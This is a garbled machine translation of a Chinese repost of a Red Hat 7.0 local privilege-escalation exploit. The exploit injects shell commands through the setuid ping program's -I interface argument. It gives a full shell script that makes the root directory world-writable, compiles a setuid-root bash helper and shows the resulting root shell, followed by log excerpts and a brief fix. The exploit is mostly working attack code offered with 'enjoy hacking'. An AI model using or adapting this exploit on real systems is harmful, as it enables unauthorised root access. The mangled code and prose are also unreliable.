RedHat7 local utilization PING Take root vulnerability details

xiaoxiao2021-03-06  91

RedHat7 local utilization PING Take root vulnerability details

First, statement, the company's coverage is not responsible for the loss caused by this vulnerability. If the attack code is not long, you can use shell or perl to write, and it is recommended to write with shell. Principle: Maybe it is the major vulnerability of RedHat7. His PING-I -I parameter specifies the interfabs to perform any code via ModProbe and Insmod, everyone knows that the power of the ping program is like this: [Hello! Sune4gle] $? Ls? -l? / bin / ping -rwsr-xr-x ???? 1? root ????? root ???????? 20604? AUG ?? 8 ?? 2000? / bin / ping ping program Call all the setuid bits of Raw_Socket, huh, we can use the PING -I parameter to ping a non-existing IP, of course, the parameters in front of IP are the key, that is, our execution command, S power makes us with ordinary authority The UID is running the EUID of ping is 0, so in fact we run the PING in the execution command with the permissions of super-support. This way if we run the following command: [Hello! Sune4gle] $ ping? -I? '; Chmod? O w?.'? 195.117.3.59? (DEV/NULL is written to other users on other users Oh, Of course, we can use the SLEEP statement to make the process waiting, use the waiting time we can write a C program, let him compile and run: cat?> / Xc? << _ Eof_ main ()? {?? setuid (0); ?? SETEUID (0); ?? SYSTEM ("CHMOD? 755? /; Rm? -F? / X;? Rm? -F? / Xc"); ?? EXECL ("/ bin / bash" , "Bash", "- I", 0);} _eof_ gcc? / xc? -o? / x chmod? 755? / x, everyone should understand? Oh, then create the XC file, and compile it, make it s power, huh, huh, make a setuid Rootshell, the following is the write code: #! / Bin / sh echo echo? "Redhat? 7.0? ? EXPLOIT "echo?" (c) 2000? suneagle?

"

echo

echo? "enjoy? Hacking !? :)"

echo

Ping = / bin / ping

Test? -u? $ ping? ||? ping = / bin / ping

IF? [?!? - u? $ ping?] ;? THEN

?? echo? "sorry,? no? setuid? ping."

?? exit? 0

Fi

echo? "Phase? 1:? MAKING? /? World-Writable ..."

$ Ping? -I? '; Chmod? O w?'? 195.117.3.59? (DEV/NULL

Sleep? 1

echo? "Phase? 2:? Compiling? Helper? Program? IN? / ..."

Cat?> / x.c? << _ EOF_

Main ()? {

?? setuid (0) ;? STEUID (0);

?? SYSTEM ("CHMOD? 755? /; rm? -f? / x;? rm? -f? /x.c");

?? EXECL ("/ bin / bash", "bash", "- i", 0);

}

_eof_

GCC? /X.c? -o? / x

CHMOD? 755? / x

echo? "Phase? 3:? Chown chmod? ON? OUR? HELPER? Program ..."

$ Ping? -I? '; Chown? 0? X'? 202.102.3.1? &> / Dev / null

Sleep? 1

$ Ping? -I? '; Chmod? S? X'? 202.101.23.1? &> / Dev / null

Sleep? 1

IF? [?!? - u? / x?] ;? THEN

?? echo? "apparently,? this? is? not? xiTemle? on? this? system? :("

?? EXIT? 1

Fi

echo? "ye!? Entering? rootshell ..."

/ x

echo? "Thank? you."

Haha, ok, I put this shell program in the REDHAT7 running test results:

First of all, I have to have a regular account, 嘿嘿

[Hello! Sune4gle] $? ./ Gtroot.sh

Redhat? 7.0 ?? EXPLOIT

(c)? 2000? suneagle?

Enjoy? Hacking !? :)

Phase? 1:? Making? /? World-write ...

Phase? 2:? Compiling? Helper? Program? IN? / ...

Phase? 3:? Chown chmod? ON? OUR? HELPER? PROGRAM ...

YE!? Entering? Rootshell ...

[Hello! Root] #? Id

UID = 0 (root)? GID = 500 (sune4gle)? groups = 500 (sune4gle)

[Hello! Root] #

Log after the attack:

Feb? 24? 11: 16:27? Sune4gle? Modprobe:? Modprobe:? Insmod?; Chmod? O w?.? Failed

Feb? 24? 11: 16: 30? Sune4gle? Modprobe:? Modprobe:? Insmod?; Chown? 0? X? Failed

Feb? 24? 11: 16: 31? Sune4gle? Modprobe:? Modprobe:? Insmod?; Chmod? S? X? Failed?

Solution:

Remove or limit the setuid bit of the PING program

[Hello! Sune4gle] #? Chmod? 655? / Bin / ping

转载请注明原文地址:https://www.9cbs.com/read-122259.html

New Post(0)